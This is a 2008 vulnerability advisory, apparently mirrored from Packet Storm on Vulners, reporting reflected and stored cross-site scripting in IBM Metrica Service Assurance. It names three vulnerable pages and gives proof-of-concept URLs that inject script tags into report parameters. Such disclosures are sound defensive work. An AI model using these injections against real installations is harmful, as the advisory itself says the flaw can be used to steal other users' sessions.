Vulners
Lucene search
metrica-xss.txt
🗓️ 09 Nov 2008 00:00:00Reported by Francesco BianchinoType 
packetstorm🔗 packetstormsecurity.com👁 23 Views
`Metrica Service Assurance Multiple Cross Site Scripting
***********************************************************************
Author: Francesco Bianchino
Email: [email protected]
Title: Metrica Service Assurance Multiple Cross Site Scripting
Vendor: IBM
***********************************************************************
Summary
Metrica Service Assurance Framework implements a distributed,
object-oriented, J2EE-based architecture. It work with a Web-based
user interfaces, from end-user report generation to detailed system
administration and configuration.
***********************************************************************
Vulnerability Detail
The web-based interface of Metrica Service Assurance is exposed to
multiple XSS attack. With an authenticated user it's possible to steal
other user's sessions due to a flaw in the input validation
mechanisms.
A persistant XSS permits the insertion of malicious code into the
web-based interface. Using the report generation function it is
possible to create a report with malicious code in the name.
That code is than rendered on the victim's browser when opening the
report history which can be found in the main panel of the
application.
The code also persists into the main panel and all the users are
exposed to the attack.
There are at least three vulnerable pages:
Non persistant:
* http://server/<document root>/ReportTree
* http://server/<document root>/Launch
Persistant:
* http://server/<document root>/ReportRequest
***********************************************************************
Exploit
http://server/<document
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
persistant XSS");</SCRIPT><!--&date=0000000000000
http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non
Persistant XSS");</SCRIPT>
http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant
XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main
***********************************************************************
Solution
At the moment of writing this advisory the is no solution yet.
***********************************************************************
Credits
Discovered and advised to IBM, November 2008 by Francesco Bianchino.
Thanks to Marco borza and to da EthicalHAkinTeam
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Nov 2008 00:00Current
7.4High risk
Vulners AI Score7.4